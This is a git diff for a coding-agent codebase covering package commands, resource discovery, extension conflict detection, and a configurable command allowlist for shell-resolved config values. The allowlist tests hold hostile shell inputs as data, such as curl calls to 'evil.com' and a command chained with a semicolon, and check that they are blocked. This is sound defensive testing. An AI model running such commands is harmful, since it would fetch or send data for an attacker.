+ afterInstallResult.hookErrors; + if (hookErrors > 0) { + stderr.write(chalk.yellow(`Lifecycle hooks completed with ${hookErrors} hook error(s).`) + "\n"); + } + stdout.write(chalk.green(`Installed ${source}`) + "\n"); + return { handled: true, exitCode: 0 }; + } + + case "remove": { + const lifecycleOptions = { + source: source!, + local: parsed.local, + cwd: options.cwd, + agentDir: options.agentDir, + appName: options.appName, + packageManager, + stdout, + stderr, + }; + const removeHooks = await prepareLifecycleHooks(lifecycleOptions, "installed"); + const beforeRemoveResult = await runLifecycleHooks(removeHooks, "beforeRemove"); + + await packageManager.remove(source!, { local: parsed.local }); + const removed = packageManager.removeSourceFromSettings(source!, { local: parsed.local }); + + const afterRemoveResult = await runLifecycleHooks(removeHooks, "afterRemove"); + const hookErrors = beforeRemoveResult.hookErrors + afterRemoveResult.hookErrors; + if (hookErrors > 0) { + stderr.write(chalk.yellow(`Lifecycle hooks completed with ${hookErrors} hook error(s).`) + "\n"); + } + + if (!removed) { + stderr.write(chalk.red(`No matching package found for ${source}`) + "\n"); + return { handled: true, exitCode: 1 }; + } + stdout.write(chalk.green(`Removed ${source}`) + "\n"); + return { handled: true, exitCode: 0 }; + } + + case "list": { + const globalSettings = settingsManager.getGlobalSettings(); + const projectSettings = settingsManager.getProjectSettings(); + const globalPackages = globalSettings.packages ?? []; + const projectPackages = projectSettings.packages ?? []; + + if (globalPackages.length === 0 && projectPackages.length === 0) { + stdout.write(chalk.dim("No packages installed.") + "\n"); + return { handled: true, exitCode: 0 }; + } + + const formatPackage = (pkg: (typeof globalPackages)[number], scope: "user" | "project") => { + const pkgSource = typeof pkg === "string" ? pkg : pkg.source; + const filtered = typeof pkg === "object"; + const display = filtered ? `${pkgSource} (filtered)` : pkgSource; + stdout.write(` ${display}\n`); + const path = packageManager.getInstalledPath(pkgSource, scope); + if (path) { + stdout.write(chalk.dim(` ${path}`) + "\n"); + } + }; + + if (globalPackages.length > 0) { + stdout.write(chalk.bold("User packages:") + "\n"); + for (const pkg of globalPackages) { + formatPackage(pkg, "user"); + } + } + + if (projectPackages.length > 0) { + if (globalPackages.length > 0) stdout.write("\n"); + stdout.write(chalk.bold("Project packages:") + "\n"); + for (const pkg of projectPackages) { + formatPackage(pkg, "project"); + } + } + + return { handled: true, exitCode: 0 }; + } + + case "update": + await packageManager.update(source); + if (source) { + stdout.write(chalk.green(`Updated ${source}`) + "\n"); + } else { + stdout.write(chalk.green("Updated packages") + "\n"); + } + return { handled: true, exitCode: 0 }; + } + } catch (error) { + const message = error instanceof Error ? error.message : "Unknown package command error"; + stderr.write(chalk.red(`Error: ${message}`) + "\n"); + return { handled: true, exitCode: 1 }; + } +} diff --git a/packages/pi-coding-agent/src/core/package-manager.ts b/packages/pi-coding-agent/src/core/package-manager.ts index 44209e04f..e07b28c4e 100644 --- a/packages/pi-coding-agent/src/core/package-manager.ts +++ b/packages/pi-coding-agent/src/core/package-manager.ts @@ -1562,6 +1562,26 @@ export class DefaultPackageManager implements PackageManager { } } + /** + * Batch-discover which resource subdirectories exist under a parent dir. + * A single readdirSync replaces 4 separate existsSync probes, reducing + * syscalls during startup. + */ + private discoverResourceSubdirs(baseDir: string): Set { + try { + const entries = readdirSync(baseDir, { withFileTypes: true }); + const names = new Set(); + for (const e of entries) { + if (e.isDirectory() || e.isSymbolicLink()) { + names.add(e.name); + } + } + return names; + } catch { + return new Set(); + } + } + private addAutoDiscoveredResources( accumulator: ResourceAccumulator, globalSettings: ReturnType, @@ -1595,6 +1615,11 @@ export class DefaultPackageManager implements PackageManager { themes: (projectSettings.themes ?? []) as string[], }; + // Batch directory discovery: one readdir of each parent replaces up to + // 4 separate existsSync calls per base directory, cutting syscalls. + const projectSubdirs = this.discoverResourceSubdirs(projectBaseDir); + const userSubdirs = this.discoverResourceSubdirs(globalBaseDir); + const userDirs = { extensions: join(globalBaseDir, "extensions"), skills: join(globalBaseDir, "skills"), @@ -1626,66 +1651,91 @@ export class DefaultPackageManager implements PackageManager { } }; - addResources( - "extensions", - collectAutoExtensionEntries(projectDirs.extensions), - projectMetadata, - projectOverrides.extensions, - projectBaseDir, - ); - addResources( - "skills", - [ - ...collectAutoSkillEntries(projectDirs.skills), + // Project resources — skip collect calls when the parent readdir shows + // the subdirectory doesn't exist (avoids redundant existsSync + readdirSync). + if (projectSubdirs.has("extensions")) { + addResources( + "extensions", + collectAutoExtensionEntries(projectDirs.extensions), + projectMetadata, + projectOverrides.extensions, + projectBaseDir, + ); + } + { + const skillEntries = [ + ...(projectSubdirs.has("skills") ? collectAutoSkillEntries(projectDirs.skills) : []), ...projectAgentsSkillDirs.flatMap((dir) => collectAutoSkillEntries(dir)), - ], - projectMetadata, - projectOverrides.skills, - projectBaseDir, - ); - addResources( - "prompts", - collectAutoPromptEntries(projectDirs.prompts), - projectMetadata, - projectOverrides.prompts, - projectBaseDir, - ); - addResources( - "themes", - collectAutoThemeEntries(projectDirs.themes), - projectMetadata, - projectOverrides.themes, - projectBaseDir, - ); + ]; + if (skillEntries.length > 0) { + addResources("skills", skillEntries, projectMetadata, projectOverrides.skills, projectBaseDir); + } + } + if (projectSubdirs.has("prompts")) { + addResources( + "prompts", + collectAutoPromptEntries(projectDirs.prompts), + projectMetadata, + projectOverrides.prompts, + projectBaseDir, + ); + } + if (projectSubdirs.has("themes")) { + addResources( + "themes", + collectAutoThemeEntries(projectDirs.themes), + projectMetadata, + projectOverrides.themes, + projectBaseDir, + ); + } - addResources( - "extensions", - collectAutoExtensionEntries(userDirs.extensions), - userMetadata, - userOverrides.extensions, - globalBaseDir, - ); - addResources( - "skills", - [...collectAutoSkillEntries(userDirs.skills), ...collectAutoSkillEntries(userAgentsSkillsDir)], - userMetadata, - userOverrides.skills, - globalBaseDir, - ); - addResources( - "prompts", - collectAutoPromptEntries(userDirs.prompts), - userMetadata, - userOverrides.prompts, - globalBaseDir, - ); - addResources( - "themes", - collectAutoThemeEntries(userDirs.themes), - userMetadata, - userOverrides.themes, - globalBaseDir, - ); + // User (global) resources + if (userSubdirs.has("extensions")) { + addResources( + "extensions", + collectAutoExtensionEntries(userDirs.extensions), + userMetadata, + userOverrides.extensions, + globalBaseDir, + ); + } + { + // Ecosystem skills (~/.agents/skills/) take priority over legacy config-dir skills. + // Skip legacy dir entirely when migration has completed (marker file present). + const legacySkillsMigrated = + resolve(userDirs.skills) !== resolve(userAgentsSkillsDir) && + existsSync(join(userDirs.skills, ".migrated-to-agents")); + const legacyUserSkillEntries = + !legacySkillsMigrated && userSubdirs.has("skills") + ? collectAutoSkillEntries(userDirs.skills) + : []; + const skillEntries = [ + ...collectAutoSkillEntries(userAgentsSkillsDir), + ...legacyUserSkillEntries, + ]; + if (skillEntries.length > 0) { + addResources("skills", skillEntries, userMetadata, userOverrides.skills, globalBaseDir); + } + } + if (userSubdirs.has("prompts")) { + addResources( + "prompts", + collectAutoPromptEntries(userDirs.prompts), + userMetadata, + userOverrides.prompts, + globalBaseDir, + ); + } + if (userSubdirs.has("themes")) { + addResources( + "themes", + collectAutoThemeEntries(userDirs.themes), + userMetadata, + userOverrides.themes, + globalBaseDir, + ); + } } private collectFilesFromPaths(paths: string[], resourceType: ResourceType): string[] { diff --git a/packages/pi-coding-agent/src/core/resolve-config-value.test.ts b/packages/pi-coding-agent/src/core/resolve-config-value.test.ts index 042e9e0ae..48a0f8f0e 100644 --- a/packages/pi-coding-agent/src/core/resolve-config-value.test.ts +++ b/packages/pi-coding-agent/src/core/resolve-config-value.test.ts @@ -1,9 +1,11 @@ -import { describe, it, beforeEach } from "node:test"; +import { describe, it, beforeEach, afterEach } from "node:test"; import assert from "node:assert/strict"; import { resolveConfigValue, clearConfigValueCache, SAFE_COMMAND_PREFIXES, + setAllowedCommandPrefixes, + getAllowedCommandPrefixes, } from "./resolve-config-value.js"; beforeEach(() => { @@ -38,21 +40,20 @@ describe("resolveConfigValue — non-command values", () => { }); describe("resolveConfigValue — command allowlist enforcement", () => { - it("blocks a disallowed command and returns undefined", () => { + it("blocks a disallowed command and returns undefined", (t) => { const stderrChunks: string[] = []; const originalWrite = process.stderr.write.bind(process.stderr); process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { stderrChunks.push(chunk.toString()); return true; }; - - try { - const result = resolveConfigValue("!curl http://evil.com"); - assert.equal(result, undefined); - assert.ok(stderrChunks.some((line) => line.includes("curl"))); - } finally { + t.after(() => { process.stderr.write = originalWrite; - } + }); + + const result = resolveConfigValue("!curl http://evil.com"); + assert.equal(result, undefined); + assert.ok(stderrChunks.some((line) => line.includes("curl"))); }); it("blocks another disallowed command (rm)", () => { @@ -65,7 +66,7 @@ describe("resolveConfigValue — command allowlist enforcement", () => { assert.equal(result, undefined); }); - it("allows a safe command prefix to proceed to execution", () => { + it("allows a safe command prefix to proceed to execution", (t) => { // `pass` is unlikely to be installed in CI, so we just verify it does NOT // return undefined due to the allowlist check — it may return undefined if // the binary is absent, but the block path must not be taken. @@ -76,16 +77,15 @@ describe("resolveConfigValue — command allowlist enforcement", () => { stderrChunks.push(chunk.toString()); return true; }; - - try { - resolveConfigValue("!pass show nonexistent-entry-for-test"); - const blocked = stderrChunks.some((line) => - line.includes("Blocked disallowed command") - ); - assert.equal(blocked, false, "pass should not be blocked by the allowlist"); - } finally { + t.after(() => { process.stderr.write = originalWrite; - } + }); + + resolveConfigValue("!pass show nonexistent-entry-for-test"); + const blocked = stderrChunks.some((line) => + line.includes("Blocked disallowed command") + ); + assert.equal(blocked, false, "pass should not be blocked by the allowlist"); }); }); @@ -130,61 +130,166 @@ describe("resolveConfigValue — shell operator bypass prevention", () => { assert.equal(result, undefined); }); - it("writes stderr warning when shell operators detected", () => { + it("writes stderr warning when shell operators detected", (t) => { const stderrChunks: string[] = []; const originalWrite = process.stderr.write.bind(process.stderr); process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { stderrChunks.push(chunk.toString()); return true; }; - - try { - resolveConfigValue("!pass show key; curl evil.com"); - assert.ok(stderrChunks.some((line) => line.includes("shell operators"))); - } finally { + t.after(() => { process.stderr.write = originalWrite; - } + }); + + resolveConfigValue("!pass show key; curl evil.com"); + assert.ok(stderrChunks.some((line) => line.includes("shell operators"))); }); }); describe("resolveConfigValue — caching", () => { - it("caches the result of a blocked command", () => { + it("caches the result of a blocked command", (t) => { const callCount = { n: 0 }; const originalWrite = process.stderr.write.bind(process.stderr); process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { callCount.n++; return true; }; - - try { - resolveConfigValue("!curl http://evil.com"); - resolveConfigValue("!curl http://evil.com"); - // The block warning should only fire once; the second call hits the cache - // before reaching the allowlist check, so stderr count is 1. - assert.equal(callCount.n, 1); - } finally { + t.after(() => { process.stderr.write = originalWrite; - } + }); + + resolveConfigValue("!curl http://evil.com"); + resolveConfigValue("!curl http://evil.com"); + // The block warning should only fire once; the second call hits the cache + // before reaching the allowlist check, so stderr count is 1. + assert.equal(callCount.n, 1); }); - it("clearConfigValueCache resets cached entries", () => { + it("clearConfigValueCache resets cached entries", (t) => { const stderrChunks: string[] = []; const originalWrite = process.stderr.write.bind(process.stderr); process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { stderrChunks.push(chunk.toString()); return true; }; - - try { - resolveConfigValue("!curl http://evil.com"); - assert.equal(stderrChunks.length, 1); - - clearConfigValueCache(); - - resolveConfigValue("!curl http://evil.com"); - assert.equal(stderrChunks.length, 2); - } finally { + t.after(() => { process.stderr.write = originalWrite; - } + }); + + resolveConfigValue("!curl http://evil.com"); + assert.equal(stderrChunks.length, 1); + + clearConfigValueCache(); + + resolveConfigValue("!curl http://evil.com"); + assert.equal(stderrChunks.length, 2); + }); +}); + +describe("REGRESSION #666: non-default credential tool blocked with no override", () => { + afterEach(() => { + setAllowedCommandPrefixes(SAFE_COMMAND_PREFIXES); + clearConfigValueCache(); + }); + + it("sops is blocked by default, then unblocked by setAllowedCommandPrefixes", (t) => { + const stderrChunks: string[] = []; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + stderrChunks.push(chunk.toString()); + return true; + }; + t.after(() => { + process.stderr.write = originalWrite; + }); + + // Bug: sops is not in SAFE_COMMAND_PREFIXES, so it's blocked + const result = resolveConfigValue("!sops decrypt --output-type json secrets.enc.json"); + assert.equal(result, undefined, "sops is blocked by the hardcoded allowlist"); + assert.ok( + stderrChunks.some((line) => line.includes('Blocked disallowed command: "sops"')), + "should log a block message for sops", + ); + + stderrChunks.length = 0; + clearConfigValueCache(); + + // Fix: override the allowlist to include sops + setAllowedCommandPrefixes([...SAFE_COMMAND_PREFIXES, "sops"]); + resolveConfigValue("!sops decrypt --output-type json secrets.enc.json"); + + const blockedAfterOverride = stderrChunks.some((line) => + line.includes("Blocked disallowed command"), + ); + assert.equal(blockedAfterOverride, false, "sops must not be blocked after override"); + }); +}); + +describe("setAllowedCommandPrefixes — user override", () => { + afterEach(() => { + setAllowedCommandPrefixes(SAFE_COMMAND_PREFIXES); + clearConfigValueCache(); + }); + + it("overrides built-in prefixes with custom list", () => { + setAllowedCommandPrefixes(["sops", "doppler"]); + assert.deepEqual([...getAllowedCommandPrefixes()], ["sops", "doppler"]); + }); + + it("custom prefix is allowed through to execution", (t) => { + const stderrChunks: string[] = []; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + stderrChunks.push(chunk.toString()); + return true; + }; + t.after(() => { + process.stderr.write = originalWrite; + }); + + setAllowedCommandPrefixes(["mycli"]); + resolveConfigValue("!mycli get-secret"); + const blocked = stderrChunks.some((line) => line.includes("Blocked disallowed command")); + assert.equal(blocked, false, "mycli should not be blocked when in the custom allowlist"); + }); + + it("previously-allowed prefix is blocked after override", (t) => { + const stderrChunks: string[] = []; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + stderrChunks.push(chunk.toString()); + return true; + }; + t.after(() => { + process.stderr.write = originalWrite; + }); + + setAllowedCommandPrefixes(["sops"]); + const result = resolveConfigValue("!pass show secret"); + assert.equal(result, undefined); + const blocked = stderrChunks.some((line) => line.includes("Blocked disallowed command")); + assert.equal(blocked, true, "pass should be blocked when not in the custom allowlist"); + }); + + it("clears cache when overriding prefixes", (t) => { + const stderrChunks: string[] = []; + const originalWrite = process.stderr.write.bind(process.stderr); + process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => { + stderrChunks.push(chunk.toString()); + return true; + }; + t.after(() => { + process.stderr.write = originalWrite; + }); + + resolveConfigValue("!mycli get-secret"); + assert.ok(stderrChunks.some((line) => line.includes("Blocked"))); + + stderrChunks.length = 0; + + setAllowedCommandPrefixes(["mycli"]); + resolveConfigValue("!mycli get-secret"); + const blocked = stderrChunks.some((line) => line.includes("Blocked")); + assert.equal(blocked, false, "Should re-evaluate after allowlist change"); }); }); diff --git a/packages/pi-coding-agent/src/core/resolve-config-value.ts b/packages/pi-coding-agent/src/core/resolve-config-value.ts index e12c4c2ae..9b72ca65f 100644 --- a/packages/pi-coding-agent/src/core/resolve-config-value.ts +++ b/packages/pi-coding-agent/src/core/resolve-config-value.ts @@ -24,6 +24,30 @@ export const SAFE_COMMAND_PREFIXES = [ "lpass", ]; +/** + * Active command prefix allowlist. Defaults to SAFE_COMMAND_PREFIXES but can be + * overridden via setAllowedCommandPrefixes() (called from settings or env var). + */ +let activeCommandPrefixes: string[] = SAFE_COMMAND_PREFIXES; + +/** + * Replace the active command prefix allowlist. + * Called during initialization when the user has configured `allowedCommandPrefixes` + * in global settings.json or via the GSD_ALLOWED_COMMAND_PREFIXES env var. + */ +export function setAllowedCommandPrefixes(prefixes: string[]): void { + if (prefixes.length === 0) { + process.stderr.write("[resolve-config-value] Warning: empty command prefix allowlist — all !commands will be blocked\n"); + } + activeCommandPrefixes = prefixes; + clearConfigValueCache(); +} + +/** Get the currently active command prefix allowlist. */ +export function getAllowedCommandPrefixes(): readonly string[] { + return activeCommandPrefixes; +} + /** * Resolve a config value (API key, header value, etc.) to an actual value. * - If starts with "!", executes the rest as a shell command and uses stdout (cached) @@ -45,8 +69,8 @@ function executeCommand(commandConfig: string): string | undefined { const command = commandConfig.slice(1); const tokens = command.split(/\s+/).filter(Boolean); const firstToken = tokens[0]; - if (!SAFE_COMMAND_PREFIXES.includes(firstToken)) { - process.stderr.write(`[resolve-config-value] Blocked disallowed command: "${firstToken}". Allowed: ${SAFE_COMMAND_PREFIXES.join(", ")}\n`); + if (!activeCommandPrefixes.includes(firstToken)) { + process.stderr.write(`[resolve-config-value] Blocked disallowed command: "${firstToken}". Allowed: ${activeCommandPrefixes.join(", ")}\n`); commandResultCache.set(commandConfig, undefined); return undefined; } diff --git a/packages/pi-coding-agent/src/core/resource-loader-cache-reset.test.ts b/packages/pi-coding-agent/src/core/resource-loader-cache-reset.test.ts new file mode 100644 index 000000000..f59c557a7 --- /dev/null +++ b/packages/pi-coding-agent/src/core/resource-loader-cache-reset.test.ts @@ -0,0 +1,42 @@ +// GSD-2 — Regression test for #3616: reload() must reset jiti extension loader cache +// Copyright (c) 2026 Jeremy McSpadden + +import test, { describe } from "node:test"; +import assert from "node:assert/strict"; +import { readFileSync } from "node:fs"; +import { join } from "node:path"; + +const source = readFileSync( + join(process.cwd(), "packages/pi-coding-agent/src/core/resource-loader.ts"), + "utf-8", +); + +describe("#3616 — reload() must invalidate jiti module cache", () => { + test("resource-loader imports resetExtensionLoaderCache from loader.js", () => { + assert.ok( + source.includes("resetExtensionLoaderCache"), + "resource-loader.ts should import resetExtensionLoaderCache", + ); + assert.ok( + source.includes('from "./extensions/loader.js"'), + "resetExtensionLoaderCache should be imported from extensions/loader.js", + ); + }); + + test("reload() calls resetExtensionLoaderCache before loadExtensions", () => { + const reloadStart = source.indexOf("async reload(): Promise"); + assert.ok(reloadStart >= 0, "should find reload() method"); + const reloadBody = source.slice(reloadStart, reloadStart + 4000); + + const resetIdx = reloadBody.indexOf("resetExtensionLoaderCache()"); + assert.ok(resetIdx >= 0, "reload() should call resetExtensionLoaderCache()"); + + const loadIdx = reloadBody.indexOf("loadExtensions("); + assert.ok(loadIdx >= 0, "reload() should call loadExtensions"); + + assert.ok( + resetIdx < loadIdx, + "resetExtensionLoaderCache() must be called BEFORE loadExtensions to ensure fresh modules", + ); + }); +}); diff --git a/packages/pi-coding-agent/src/core/resource-loader.ts b/packages/pi-coding-agent/src/core/resource-loader.ts index c8c1c048c..34ab7565e 100644 --- a/packages/pi-coding-agent/src/core/resource-loader.ts +++ b/packages/pi-coding-agent/src/core/resource-loader.ts @@ -1,6 +1,6 @@ import { existsSync, readdirSync, readFileSync, statSync } from "node:fs"; import { homedir } from "node:os"; -import { join, resolve, sep } from "node:path"; +import { basename, dirname, join, relative, resolve, sep } from "node:path"; import chalk from "chalk"; import { CONFIG_DIR_NAME, getAgentDir } from "../config.js"; import { loadThemeFromPath, type Theme } from "../modes/interactive/theme/theme.js"; @@ -9,7 +9,7 @@ import type { ResourceCollision, ResourceDiagnostic } from "./diagnostics.js"; export type { ResourceCollision, ResourceDiagnostic } from "./diagnostics.js"; import { createEventBus, type EventBus } from "./event-bus.js"; -import { createExtensionRuntime, loadExtensionFromFactory, loadExtensions } from "./extensions/loader.js"; +import { createExtensionRuntime, loadExtensionFromFactory, loadExtensions, resetExtensionLoaderCache } from "./extensions/loader.js"; import type { Extension, ExtensionFactory, ExtensionRuntime, LoadExtensionsResult } from "./extensions/types.js"; import { DefaultPackageManager, type PathMetadata } from "./package-manager.js"; import type { PromptTemplate } from "./prompt-templates.js"; @@ -121,12 +121,21 @@ export interface DefaultResourceLoaderOptions { additionalPromptTemplatePaths?: string[]; additionalThemePaths?: string[]; extensionFactories?: ExtensionFactory[]; + bundledExtensionKeys?: Set; noExtensions?: boolean; noSkills?: boolean; noPromptTemplates?: boolean; noThemes?: boolean; systemPrompt?: string; appendSystemPrompt?: string; + /** Names of bundled extensions (used to identify built-in extensions in conflict detection). */ + bundledExtensionNames?: Set; + /** + * Transform extension paths before loading. Receives the merged list of all + * discovered extension paths and returns a (possibly reordered/filtered) list. + * Use this to apply dependency sorting or registry-based filtering. + */ + extensionPathsTransform?: (paths: string[]) => { paths: string[]; diagnostics?: string[] }; extensionsOverride?: (base: LoadExtensionsResult) => LoadExtensionsResult; skillsOverride?: (base: { skills: Skill[]; diagnostics: ResourceDiagnostic[] }) => { skills: Skill[]; @@ -153,6 +162,7 @@ export class DefaultResourceLoader implements ResourceLoader { private settingsManager: SettingsManager; private eventBus: EventBus; private packageManager: DefaultPackageManager; + private bundledExtensionKeys: Set; private additionalExtensionPaths: string[]; private additionalSkillPaths: string[]; private additionalPromptTemplatePaths: string[]; @@ -164,6 +174,8 @@ export class DefaultResourceLoader implements ResourceLoader { private noThemes: boolean; private systemPromptSource?: string; private appendSystemPromptSource?: string; + private bundledExtensionNames: Set; + private extensionPathsTransform?: (paths: string[]) => { paths: string[]; diagnostics?: string[] }; private extensionsOverride?: (base: LoadExtensionsResult) => LoadExtensionsResult; private skillsOverride?: (base: { skills: Skill[]; diagnostics: ResourceDiagnostic[] }) => { skills: Skill[]; @@ -208,6 +220,7 @@ export class DefaultResourceLoader implements ResourceLoader { agentDir: this.agentDir, settingsManager: this.settingsManager, }); + this.bundledExtensionKeys = options.bundledExtensionKeys ?? new Set(); this.additionalExtensionPaths = options.additionalExtensionPaths ?? []; this.additionalSkillPaths = options.additionalSkillPaths ?? []; this.additionalPromptTemplatePaths = options.additionalPromptTemplatePaths ?? []; @@ -219,6 +232,8 @@ export class DefaultResourceLoader implements ResourceLoader { this.noThemes = options.noThemes ?? false; this.systemPromptSource = options.systemPrompt; this.appendSystemPromptSource = options.appendSystemPrompt; + this.bundledExtensionNames = options.bundledExtensionNames ?? new Set(); + this.extensionPathsTransform = options.extensionPathsTransform; this.extensionsOverride = options.extensionsOverride; this.skillsOverride = options.skillsOverride; this.promptsOverride = options.promptsOverride; @@ -305,6 +320,10 @@ export class DefaultResourceLoader implements ResourceLoader { } async reload(): Promise { + // Invalidate the shared jiti module cache so updated extension code + // on disk is re-compiled instead of served from the stale cache (#3616). + resetExtensionLoaderCache(); + const resolvedPaths = await this.packageManager.resolve(); const cliExtensionPaths = await this.packageManager.resolveExtensionSources(this.additionalExtensionPaths, { temporary: true, @@ -374,10 +393,21 @@ export class DefaultResourceLoader implements ResourceLoader { const cliEnabledPrompts = getEnabledPaths(cliExtensionPaths.prompts); const cliEnabledThemes = getEnabledPaths(cliExtensionPaths.themes); - const extensionPaths = this.noExtensions + let extensionPaths = this.noExtensions ? cliEnabledExtensions : this.mergePaths(cliEnabledExtensions, enabledExtensions); + // Apply path transform (dependency sorting, registry filtering) if provided + if (this.extensionPathsTransform) { + const transformed = this.extensionPathsTransform(extensionPaths); + extensionPaths = transformed.paths; + if (transformed.diagnostics?.length) { + for (const msg of transformed.diagnostics) { + process.stderr.write(`[extensions] ${msg}\n`); + } + } + } + const extensionsResult = await loadExtensions(extensionPaths, this.cwd, this.eventBus); const inlineExtensions = await this.loadExtensionFactories(extensionsResult.runtime); extensionsResult.extensions.push(...inlineExtensions.extensions); @@ -790,66 +820,110 @@ export class DefaultResourceLoader implements ResourceLoader { return target.startsWith(prefix); } + /** + * Extract the extension name from its path. + * For root-level files: basename without extension (e.g. "search-the-web.ts" → "search-the-web") + * For subdirectory extensions: the directory name (e.g. "/path/to/gsd/index.ts" → "gsd") + */ + private getExtensionNameFromPath(extPath: string): string { + const base = basename(extPath); + if (base === "index.js" || base === "index.ts") { + return basename(dirname(extPath)); + } + return base.replace(/\.(?:ts|js)$/, ""); + } + private detectExtensionConflicts(extensions: Extension[]): Array<{ path: string; message: string }> { - const conflicts: Array<{ path: string; message: string }> = []; + return detectExtensionConflicts(extensions, this.bundledExtensionKeys, join(this.agentDir, "extensions")); + } +} - // Track which extension registered each tool, command, and flag - const toolOwners = new Map(); - const commandOwners = new Map(); - const flagOwners = new Map(); +/** + * Extract the extension directory name (key) from a full extension path. + * Given extensionsDir `/home/user/.gsd/agent/extensions` and + * ownerPath `/home/user/.gsd/agent/extensions/mcp-client/index.js`, + * returns `"mcp-client"`. Returns `undefined` when the path is not + * under extensionsDir. + */ +export function extractExtensionKey(ownerPath: string, extensionsDir: string): string | undefined { + const normalizedDir = resolve(extensionsDir); + const normalizedPath = resolve(ownerPath); + const prefix = normalizedDir.endsWith(sep) ? normalizedDir : `${normalizedDir}${sep}`; + if (!normalizedPath.startsWith(prefix)) { + return undefined; + } + const relPath = relative(normalizedDir, normalizedPath); + const firstSegment = relPath.split(/[\\/]/)[0]; + return firstSegment?.replace(/\.(?:ts|js)$/, "") || undefined; +} - for (const ext of extensions) { - // Check tools - for (const toolName of ext.tools.keys()) { - const existingOwner = toolOwners.get(toolName); - if (existingOwner && existingOwner !== ext.path) { - // Determine if the existing owner is a built-in (not a user extension) - const isBuiltIn = !existingOwner.includes("/.gsd/agent/extensions/") && - !existingOwner.includes("/.gsd/extensions/"); - const hint = isBuiltIn - ? ` (built-in tool supersedes — consider removing ${ext.path})` - : ""; - conflicts.push({ - path: ext.path, - message: `Tool "${toolName}" conflicts with ${existingOwner}${hint}`, - }); - } else { - toolOwners.set(toolName, ext.path); - } - } +/** + * Detect tool/command/flag name collisions across loaded extensions. + * + * When the first-registered owner of a name is a bundled extension + * (its key appears in `bundledExtensionKeys`), the conflict message + * includes a "supersedes" hint so downstream display can downgrade the + * severity from "Extension load error" to "Extension conflict". + */ +export function detectExtensionConflicts( + extensions: Extension[], + bundledExtensionKeys: Set, + extensionsDir: string, +): Array<{ path: string; message: string }> { + const conflicts: Array<{ path: string; message: string }> = []; - // Check commands - for (const commandName of ext.commands.keys()) { - const existingOwner = commandOwners.get(commandName); - if (existingOwner && existingOwner !== ext.path) { - const isBuiltIn = !existingOwner.includes("/.gsd/agent/extensions/") && - !existingOwner.includes("/.gsd/extensions/"); - const hint = isBuiltIn - ? ` (built-in command supersedes — consider removing ${ext.path})` - : ""; - conflicts.push({ - path: ext.path, - message: `Command "/${commandName}" conflicts with ${existingOwner}${hint}`, - }); - } else { - commandOwners.set(commandName, ext.path); - } - } + const toolOwners = new Map(); + const commandOwners = new Map(); + const flagOwners = new Map(); - // Check flags - for (const flagName of ext.flags.keys()) { - const existingOwner = flagOwners.get(flagName); - if (existingOwner && existingOwner !== ext.path) { - conflicts.push({ - path: ext.path, - message: `Flag "--${flagName}" conflicts with ${existingOwner}`, - }); - } else { - flagOwners.set(flagName, ext.path); - } + const isBundled = (ownerPath: string): boolean => { + const key = extractExtensionKey(ownerPath, extensionsDir); + return key !== undefined && bundledExtensionKeys.has(key); + }; + + for (const ext of extensions) { + for (const toolName of ext.tools.keys()) { + const existingOwner = toolOwners.get(toolName); + if (existingOwner && existingOwner !== ext.path) { + const hint = isBundled(existingOwner) + ? ` (built-in tool supersedes — consider removing ${ext.path})` + : ""; + conflicts.push({ + path: ext.path, + message: `Tool "${toolName}" conflicts with ${existingOwner}${hint}`, + }); + } else { + toolOwners.set(toolName, ext.path); } } - return conflicts; + for (const commandName of ext.commands.keys()) { + const existingOwner = commandOwners.get(commandName); + if (existingOwner && existingOwner !== ext.path) { + const hint = isBundled(existingOwner) + ? ` (built-in command supersedes — consider removing ${ext.path})` + : ""; + conflicts.push({ + path: ext.path, + message: `Command "/${commandName}" conflicts with ${existingOwner}${hint}`, + }); + } else { + commandOwners.set(commandName, ext.path); + } + } + + for (const flagName of ext.flags.keys()) { + const existingOwner = flagOwners.get(flagName); + if (existingOwner && existingOwner !== ext.path) { + conflicts.push({ + path: ext.path, + message: `Flag "--${flagName}" conflicts with ${existingOwner}`, + }); + } else { + flagOwners.set(flagName, ext.path); + } + } } + + return conflicts; } diff --git a/packages/pi-coding-agent/src/core/retry-handler.test.ts b/packages/pi-coding-agent/src/core/retry-handler.test.ts new file mode 100644 index 000000000..5cd324401 --- /dev/null +++ b/packages/pi-coding-agent/src/core/retry-handler.test.ts @@ -0,0 +1,431 @@ +/** + * RetryHandler tests — long-context entitlement 429 error handling (#2803) + * + * Verifies that "Extra usage is required for long context requests" errors + * are classified as quota_exhausted (not rate_limit) and trigger a model + * downgrade from [1m] to base when no cross-provider fallback exists. + */ + +import { describe, it, beforeEach, mock, type Mock } from "node:test"; +import assert from "node:assert/strict"; +import { RetryHandler, type RetryHandlerDeps } from "./retry-handler.js"; +import type { Api, AssistantMessage, Model } from "@gsd/pi-ai"; +import type { FallbackResolver } from "./fallback-resolver.js"; +import type { ModelRegistry } from "./model-registry.js"; +import type { SettingsManager } from "./settings-manager.js"; + +// ─── Helpers ──────────────────────────────────────────────────────────────── + +function createMockModel(provider: string, id: string): Model { + return { + id, + name: id, + api: "anthropic" as Api, + provider, + baseUrl: "https://api.anthropic.com", + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 1_000_000, + maxTokens: 16384, + } as Model; +} + +function errorMessage(msg: string): AssistantMessage { + return { + role: "assistant", + content: [], + api: "anthropic-messages", + provider: "anthropic", + model: "claude-opus-4-6[1m]", + usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, + stopReason: "error", + errorMessage: msg, + timestamp: Date.now(), + } as AssistantMessage; +} + +interface MockDeps { + deps: RetryHandlerDeps; + emittedEvents: Array>; + continueFn: Mock<() => Promise>; + onModelChangeFn: Mock<(model: Model) => void>; + markUsageLimitReached: Mock<(...args: any[]) => boolean>; + findFallback: Mock<(...args: any[]) => Promise>; + findModel: Mock<(provider: string, modelId: 